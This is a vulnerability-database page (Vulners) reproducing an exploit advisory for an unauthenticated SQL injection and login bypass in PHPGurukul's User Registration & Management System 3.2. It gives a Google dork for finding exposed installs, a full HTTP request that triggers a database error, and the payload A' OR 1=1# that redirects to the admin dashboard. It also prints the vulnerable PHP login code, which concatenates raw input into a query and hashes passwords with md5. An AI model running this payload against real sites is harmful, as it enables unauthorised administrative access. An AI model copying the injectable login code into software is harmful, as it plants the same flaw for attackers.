Vulners
Lucene search
User Registration And Management System 3.2 SQL Injection
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:.
inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
username='&password=test&login=
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9
===========================================================================================
Test #2 => Payload to skip authentication
http://localhost:9000/loginsystem/admin/index.php
username=A' OR 1=1#&password=1&login=
Response:
302 redirect to dashboard.php
===========================================================================================
Vuln File:/loginsystem/admin/index.php
Vul Code:
<?php session_start();
include_once('../includes/config.php');
// Code for login
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4